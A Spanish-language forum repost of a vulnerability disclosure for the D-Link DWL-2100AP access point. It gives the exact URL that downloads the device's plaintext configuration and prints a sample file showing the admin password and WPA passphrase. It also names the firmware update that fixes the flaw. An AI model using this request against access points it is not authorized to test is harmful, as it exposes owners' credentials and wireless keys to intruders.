Como creo que es un tema interesante pongo esta información que leí en la página hermana:
DWL-2100APMarca: Dlink
Modelo: DWL-2100AP
Categoria: Punto de Acceso
Firmware afectado: 2.10 y versiones anteriores !!
Tipo agujero: Fichero de configuracion accesible ( .cfg )
Informacion: en texto plano
Vulnerabilidad descubierta por: INTRUDERS TIGER TEAM SECURITY
La vulnerabilidad nos permitirá acceder a la siguiente información:
-Usuario y contraseña del AP
-Contraseña WEP o WPA
-Direcciones MAC filtradas,etc
Procedimiento:
http://IP_del_AP/cgi-bin/Intruders.cfg
Nos devuelve el archivo de configuración intruders.cfg. Y si lo miramos es de este estilo:
Copyright© 2002 Atheros Communications, Inc., All Rights Reserved
DO NOT EDIT—This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
Several lines removed.
Donde podemos encontrar mucha información user/pasword, clave WEP/WPA...
Para evitar la vulnerabilidad se puede actualizar a la versión 2.20 del firmware disponible en la web oficial de D-link Iberia.
Podemos ver un video demostrativo aquí:
http://milw0rm.com/video/watch.php?id=31Información extraída de la pagina hermana:
http://foro.elhacker.net/hacking_wireless/alguien_puede_decir_como_hacen_lo_de_este_video-t236907.0.html;msg1131872#msg1131872Saludos